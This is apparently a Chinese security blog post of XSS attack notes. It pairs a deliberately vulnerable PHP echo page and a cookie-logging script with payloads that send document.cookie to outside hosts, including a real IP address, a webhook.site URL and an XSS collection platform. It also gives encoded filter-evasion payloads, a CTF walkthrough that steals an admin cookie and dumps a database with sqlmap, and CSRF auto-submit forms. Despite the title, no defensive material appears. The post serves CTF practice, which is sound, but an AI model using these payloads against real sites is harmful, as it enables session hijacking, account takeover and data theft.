XSS跨站脚本攻击剖析与防御
2019-11-19
cookie欺骗攻击
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php
setcookie("name","cookie");
if(isset($_POST['name']))
{
echo $_POST['name'];
}
?>
<html>
<body>
<form action="" method="post">
Name: <input type="text" name="name"><br>
<input type="submit">
</form>
</body>
</html>
|
getcookie.php
1
2
3
4
5
6
| <?php
$cookie1=$_GET['cookie'];
$log=fopen("demo.txt","a");
fwrite($log,$cookie1."\n");
fclose($log)
?>
|
payload,输入框输入
1
| <script>var img = document.createElement('img');img.src = 'http://localhost/getcookie.php?cookie='+encodeURIComponent(document.cookie);</script>
|
1
| <script>window.location="http://119.91.208.70:4041/"+document.cookie;</script>
|
成功在demo.txt中获得cookie
一些payload
1
2
3
4
5
6
7
8
9
10
11
| <img src = "#" onerror=alert(/xss/)>
<img src="x" onerror="alert(1)">
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
原code:
<img src="1" onerror=eval("alert('xss')")></img>
<a href="" onclick="alert(1)">aaaaa</a>
<a href="" onclick=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>aaaaa</a>
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src=1 onmouseover=alert('xss') y=2016 /><iframe>
|
CISCN 2019 华东北赛区 Web2
方法: 投稿-》反馈-》获得管理员cookie-》注入
HTML Markup转码
1
2
3
4
5
6
7
8
| in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"
output = ""
for c in in_str:
output += "&#" + str(ord(c))
print("<svg><script>eval("" + output + "")</script>")
|
丢平台上后
然后爆破md5
1
2
3
4
5
6
7
| import hashlib
for i in range(1, 10000001):
s = hashlib.md5(str(i).encode('utf-8')).hexdigest()[0:6]
if s == "4426f0":
print(i)
break
|
置管理员 cookie,猜测后台路径,发现 /admin.php 能访问。
注入获取flag
1
2
| python sqlmap.py -u http://502ce080-5cd5-4c3d-8467-1fc354132f71.node3.buuoj.cn/admin.php?id=2 --cookie="PHPSESSID=57bd5e76b87b83da7e7332ad6f60cdd7" -T flag --dump --flush-session
--fresh-queries --fresh-queries --delay 0.1
|
poc
1
2
| <script> image = new Image(); image.src='https://webhook.site/5be08d40-7d3d-42e8-81ed-e476f0fdeaa6?'+document.cookie; </script>
|
root-me
1
2
3
4
5
6
| <img src=x onerror=alert(1)>
http://challenge01.root-me.org:58008/page?user=<img src=x onerror='window.location=atob("aHR0cHM6Ly93ZWJob29rLnNpdGUvNWJlMDhkNDAtN2QzZC00MmU4LTgxZWQtZTQ3NmYwZmRlYWE2").concat("/FETCH?html=").concat(btoa(document.body.innerText))'>
btoa("https://webhook.site/5be08d40-7d3d-42e8-81ed-e476f0fdeaa6")
|
csrf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| CSRF - 0 protection
<form name="csrf" action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="post" enctype="multipart/form-data">
<input type="hidden" name="username" value="test">
<input type="hidden" name="status" value="on">
</form> <script>document.csrf.submit()</script>
<form name="csrf" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST" enctype="multipart/form-data">
<input type="text" name="username" value="test" />
<input type="checkbox" name="status" checked=checked />
<input type="submit" value="Submit request" />
</form>
<script>document.csrf.submit()</script>
<form name="csrf" action="https://webhook.site/5be08d40-7d3d-42e8-81ed-e476f0fdeaa6/?action=profile" method="post" enctype="multipart/form-data">
<input type="hidden" name="username" value="test">
<input type="hidden" name="status" value="on">
</form> <script>document.csrf.submit()</script>
|